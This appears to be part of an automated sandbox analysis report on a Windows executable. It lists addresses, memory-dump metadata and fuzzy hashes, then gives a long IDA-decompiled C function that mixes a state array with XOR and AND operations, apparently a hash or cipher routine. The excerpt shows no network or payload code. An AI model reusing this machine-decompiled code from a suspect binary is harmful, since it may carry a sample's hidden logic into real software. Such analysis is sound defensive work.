                                                                                                                                                                                                                                                                                    0x004073fd
                                                                                                                                                                                                                                                                                    0x00407408
                                                                                                                                                                                                                                                                                    0x00407413
                                                                                                                                                                                                                                                                                    0x00407416
                                                                                                                                                                                                                                                                                    0x00407421
                                                                                                                                                                                                                                                                                    0x0040742c
                                                                                                                                                                                                                                                                                    0x0040742f
                                                                                                                                                                                                                                                                                    0x00407432
                                                                                                                                                                                                                                                                                    0x00407436
                                                                                                                                                                                                                                                                                    0x00407442
                                                                                                                                                                                                                                                                                    0x00407453
                                                                                                                                                                                                                                                                                    0x00407472
                                                                                                                                                                                                                                                                                    0x00407475
                                                                                                                                                                                                                                                                                    0x0040747e
                                                                                                                                                                                                                                                                                    0x0040663f
                                                                                                                                                                                                                                                                                    0x0040663f
                                                                                                                                                                                                                                                                                    0x0040748b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                                    • String ID: Y
                                                                                                                                                                                                                                                                                    • API String ID: 673498613-3233089245
                                                                                                                                                                                                                                                                                    • Opcode ID: 09cbb751b792f03c7f6d5a955a369f2f8d676be8134a4cde34a5b795885ac806
                                                                                                                                                                                                                                                                                    • Instruction ID: 81f0246d34d418f551b066bcc026a41a7d0f506a16a213b2528972a7a3f3234d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09cbb751b792f03c7f6d5a955a369f2f8d676be8134a4cde34a5b795885ac806
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38D22A79D11619EFCB54CF99C18099EFBF1FF88360F62859AD845AB305C630AA91DF80
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00406639() {
                                                                                                                                                                                                                                                                                    				signed int _t1392;
                                                                                                                                                                                                                                                                                    				signed int _t1393;
                                                                                                                                                                                                                                                                                    				signed int _t1394;
                                                                                                                                                                                                                                                                                    				signed int _t1398;
                                                                                                                                                                                                                                                                                    				signed int _t1408;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1409;
                                                                                                                                                                                                                                                                                    				signed int _t1419;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1420;
                                                                                                                                                                                                                                                                                    				signed int _t1430;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1431;
                                                                                                                                                                                                                                                                                    				signed int _t1441;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1442;
                                                                                                                                                                                                                                                                                    				signed int _t1452;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1453;
                                                                                                                                                                                                                                                                                    				signed int _t1463;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1464;
                                                                                                                                                                                                                                                                                    				signed int _t1474;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1475;
                                                                                                                                                                                                                                                                                    				signed int _t1485;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1486;
                                                                                                                                                                                                                                                                                    				signed int _t1496;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1497;
                                                                                                                                                                                                                                                                                    				signed int _t1507;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1508;
                                                                                                                                                                                                                                                                                    				signed int _t1518;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1519;
                                                                                                                                                                                                                                                                                    				signed int _t1529;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1530;
                                                                                                                                                                                                                                                                                    				signed int _t1540;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1541;
                                                                                                                                                                                                                                                                                    				signed int _t1551;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1552;
                                                                                                                                                                                                                                                                                    				signed int _t1562;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1563;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1572;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1573;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1574;
                                                                                                                                                                                                                                                                                    				signed int _t1575;
                                                                                                                                                                                                                                                                                    				signed int _t1581;
                                                                                                                                                                                                                                                                                    				signed int _t1582;
                                                                                                                                                                                                                                                                                    				signed int _t1583;
                                                                                                                                                                                                                                                                                    				signed int _t1584;
                                                                                                                                                                                                                                                                                    				signed int _t1588;
                                                                                                                                                                                                                                                                                    				signed int _t1591;
                                                                                                                                                                                                                                                                                    				signed int _t1592;
                                                                                                                                                                                                                                                                                    				signed int _t1593;
                                                                                                                                                                                                                                                                                    				signed int _t1594;
                                                                                                                                                                                                                                                                                    				signed int _t1598;
                                                                                                                                                                                                                                                                                    				signed int _t1601;
                                                                                                                                                                                                                                                                                    				signed int _t1602;
                                                                                                                                                                                                                                                                                    				signed int _t1603;
                                                                                                                                                                                                                                                                                    				signed int _t1604;
                                                                                                                                                                                                                                                                                    				signed int _t1608;
                                                                                                                                                                                                                                                                                    				signed int _t1611;
                                                                                                                                                                                                                                                                                    				signed int _t1612;
                                                                                                                                                                                                                                                                                    				signed int _t1613;
                                                                                                                                                                                                                                                                                    				signed int _t1614;
                                                                                                                                                                                                                                                                                    				signed int _t1618;
                                                                                                                                                                                                                                                                                    				signed int _t1621;
                                                                                                                                                                                                                                                                                    				signed int _t1622;
                                                                                                                                                                                                                                                                                    				signed int _t1623;
                                                                                                                                                                                                                                                                                    				signed int _t1624;
                                                                                                                                                                                                                                                                                    				signed int _t1628;
                                                                                                                                                                                                                                                                                    				signed int _t1631;
                                                                                                                                                                                                                                                                                    				signed int _t1632;
                                                                                                                                                                                                                                                                                    				signed int _t1633;
                                                                                                                                                                                                                                                                                    				signed int _t1634;
                                                                                                                                                                                                                                                                                    				signed int _t1638;
                                                                                                                                                                                                                                                                                    				signed int _t1641;
                                                                                                                                                                                                                                                                                    				signed int _t1642;
                                                                                                                                                                                                                                                                                    				signed int _t1643;
                                                                                                                                                                                                                                                                                    				signed int _t1644;
                                                                                                                                                                                                                                                                                    				signed int _t1648;
                                                                                                                                                                                                                                                                                    				signed int _t1651;
                                                                                                                                                                                                                                                                                    				signed int _t1652;
                                                                                                                                                                                                                                                                                    				signed int _t1653;
                                                                                                                                                                                                                                                                                    				signed int _t1654;
                                                                                                                                                                                                                                                                                    				signed int _t1658;
                                                                                                                                                                                                                                                                                    				signed int _t1661;
                                                                                                                                                                                                                                                                                    				signed int _t1662;
                                                                                                                                                                                                                                                                                    				signed int _t1663;
                                                                                                                                                                                                                                                                                    				signed int _t1664;
                                                                                                                                                                                                                                                                                    				signed int _t1668;
                                                                                                                                                                                                                                                                                    				signed int _t1671;
                                                                                                                                                                                                                                                                                    				signed int _t1672;
                                                                                                                                                                                                                                                                                    				signed int _t1673;
                                                                                                                                                                                                                                                                                    				signed int _t1674;
                                                                                                                                                                                                                                                                                    				signed int _t1678;
                                                                                                                                                                                                                                                                                    				signed int _t1681;
                                                                                                                                                                                                                                                                                    				signed int _t1682;
                                                                                                                                                                                                                                                                                    				signed int _t1683;
                                                                                                                                                                                                                                                                                    				signed int _t1684;
                                                                                                                                                                                                                                                                                    				signed int _t1688;
                                                                                                                                                                                                                                                                                    				signed int _t1691;
                                                                                                                                                                                                                                                                                    				signed int _t1692;
                                                                                                                                                                                                                                                                                    				signed int _t1693;
                                                                                                                                                                                                                                                                                    				signed int _t1694;
                                                                                                                                                                                                                                                                                    				signed int _t1698;
                                                                                                                                                                                                                                                                                    				signed int _t1701;
                                                                                                                                                                                                                                                                                    				signed int _t1702;
                                                                                                                                                                                                                                                                                    				signed int _t1703;
                                                                                                                                                                                                                                                                                    				signed int _t1704;
                                                                                                                                                                                                                                                                                    				signed int _t1708;
                                                                                                                                                                                                                                                                                    				signed int _t1711;
                                                                                                                                                                                                                                                                                    				signed int _t1712;
                                                                                                                                                                                                                                                                                    				signed int _t1713;
                                                                                                                                                                                                                                                                                    				signed int _t1714;
                                                                                                                                                                                                                                                                                    				signed int _t1718;
                                                                                                                                                                                                                                                                                    				signed int _t1721;
                                                                                                                                                                                                                                                                                    				signed int _t1722;
                                                                                                                                                                                                                                                                                    				signed int _t1723;
                                                                                                                                                                                                                                                                                    				signed int _t1724;
                                                                                                                                                                                                                                                                                    				signed int _t1728;
                                                                                                                                                                                                                                                                                    				signed int _t1731;
                                                                                                                                                                                                                                                                                    				signed int _t1743;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1744;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1750;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1751;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1752;
                                                                                                                                                                                                                                                                                    				signed int _t1753;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1762;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1763;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1764;
                                                                                                                                                                                                                                                                                    				signed int _t1765;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1774;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1775;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1776;
                                                                                                                                                                                                                                                                                    				signed int _t1777;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1786;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1787;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1788;
                                                                                                                                                                                                                                                                                    				signed int _t1789;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1798;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1799;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1800;
                                                                                                                                                                                                                                                                                    				signed int _t1801;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1810;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1811;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1812;
                                                                                                                                                                                                                                                                                    				signed int _t1813;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1822;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1823;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1824;
                                                                                                                                                                                                                                                                                    				signed int _t1825;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1834;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1835;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1836;
                                                                                                                                                                                                                                                                                    				signed int _t1837;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1846;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1847;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1848;
                                                                                                                                                                                                                                                                                    				signed int _t1849;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1858;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1859;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1860;
                                                                                                                                                                                                                                                                                    				signed int _t1861;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1870;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1871;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1872;
                                                                                                                                                                                                                                                                                    				signed int _t1873;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1882;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1883;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1884;
                                                                                                                                                                                                                                                                                    				signed int _t1885;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1894;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1895;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1896;
                                                                                                                                                                                                                                                                                    				signed int _t1897;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1906;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1907;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1908;
                                                                                                                                                                                                                                                                                    				signed int _t1909;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1918;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1919;
                                                                                                                                                                                                                                                                                    				intOrPtr _t1920;
                                                                                                                                                                                                                                                                                    				signed int _t1921;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2038;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2039;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2040;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2045;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2046;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2047;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2052;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2053;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2054;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2059;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2060;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2061;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2066;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2067;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2068;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2073;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2074;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2075;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2080;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2081;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2082;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2087;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2088;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2089;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2094;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2095;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2096;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2101;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2102;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2103;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2108;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2109;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2110;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2115;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2116;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2117;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2122;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2123;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2124;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2129;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2130;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2131;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2136;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2137;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2138;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2143;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2144;
                                                                                                                                                                                                                                                                                    				intOrPtr _t2145;
                                                                                                                                                                                                                                                                                    				void* _t2149;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t2149 - 0x1c)) =  *((intOrPtr*)(_t2149 - 0x1c)) + 0x10;
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					_t1391 =  *(_t2149 + 0xc) << 4;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t2149 - 0x1c)) < _t1391) {
                                                                                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1392 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1572 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1572 + _t1392 * 8 - 0x2c8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1572 + _t1392 * 8 - 0x2c4);
                                                                                                                                                                                                                                                                                    						_t1393 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1573 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1573 + _t1393 * 8 - 0x88);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1573 + _t1393 * 8 - 0x84);
                                                                                                                                                                                                                                                                                    						_t1394 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1574 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1743 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2038 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1574 + _t1394 * 8 - 0x90) &  *(_t2038 + _t1743 * 8 - 0xa8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1574 + _t1394 * 8 - 0x8c) &  *(_t2038 + _t1743 * 8 - 0xa4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1575 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1744 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1398 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2039 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1744 + _t1575 * 8 - 0xf8) &  *(_t2039 + _t1398 * 8 - 0x218) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1744 + _t1575 * 8 - 0xf4) &  *(_t2039 + _t1398 * 8 - 0x214) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1581 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2040 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2040 + _t1581 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2040 + 4 + _t1581 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1582 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1750 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1750 + _t1582 * 8 - 0x2c0);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1750 + _t1582 * 8 - 0x2bc);
                                                                                                                                                                                                                                                                                    						_t1583 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1751 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1751 + _t1583 * 8 - 0x80);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1751 + _t1583 * 8 - 0x7c);
                                                                                                                                                                                                                                                                                    						_t1584 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1752 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1408 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2045 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1752 + _t1584 * 8 - 0x88) &  *(_t2045 + _t1408 * 8 - 0xa0) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1752 + _t1584 * 8 - 0x84) &  *(_t2045 + _t1408 * 8 - 0x9c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1753 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1409 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1588 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2046 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1409 + _t1753 * 8 - 0xf0) &  *(_t2046 + _t1588 * 8 - 0x210) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1409 + _t1753 * 8 - 0xec) &  *(_t2046 + _t1588 * 8 - 0x20c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1591 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2047 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2047 + 8 + _t1591 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2047 + 0xc + _t1591 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1592 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1762 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1762 + _t1592 * 8 - 0x2b8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1762 + _t1592 * 8 - 0x2b4);
                                                                                                                                                                                                                                                                                    						_t1593 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1763 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1763 + _t1593 * 8 - 0x78);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1763 + _t1593 * 8 - 0x74);
                                                                                                                                                                                                                                                                                    						_t1594 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1764 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1419 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2052 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1764 + _t1594 * 8 - 0x80) &  *(_t2052 + _t1419 * 8 - 0x98) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1764 + _t1594 * 8 - 0x7c) &  *(_t2052 + _t1419 * 8 - 0x94) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1765 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1420 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1598 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2053 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1420 + _t1765 * 8 - 0xe8) &  *(_t2053 + _t1598 * 8 - 0x208) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1420 + _t1765 * 8 - 0xe4) &  *(_t2053 + _t1598 * 8 - 0x204) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
                                                                                                                                                                                                                                                                                    						_t1601 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2054 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2054 + 0x10 + _t1601 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2054 + 0x14 + _t1601 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                                                                                                                                                                                                                    						_t1602 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1774 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1774 + _t1602 * 8 - 0x2b0);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1774 + _t1602 * 8 - 0x2ac);
                                                                                                                                                                                                                                                                                    						_t1603 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1775 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1775 + _t1603 * 8 - 0x70);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1775 + _t1603 * 8 - 0x6c);
                                                                                                                                                                                                                                                                                    						_t1604 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1776 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1430 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2059 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1776 + _t1604 * 8 - 0x78) &  *(_t2059 + _t1430 * 8 - 0x90) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1776 + _t1604 * 8 - 0x74) &  *(_t2059 + _t1430 * 8 - 0x8c) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						_t1777 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t1431 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						_t1608 =  *(_t2149 - 0xc);
                                                                                                                                                                                                                                                                                    						_t2060 =  *((intOrPtr*)(_t2149 + 8));
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t1431 + _t1777 * 8 - 0xe0) &  *(_t2060 + _t1608 * 8 - 0x200) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t1431 + _t1777 * 8 - 0xdc) &  *(_t2060 + _t1608 * 8 - 0x1fc) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDF8();
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                                                                                                                                                                                                                    						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                                                                                                                                                                                                                    						L0040EDFE();
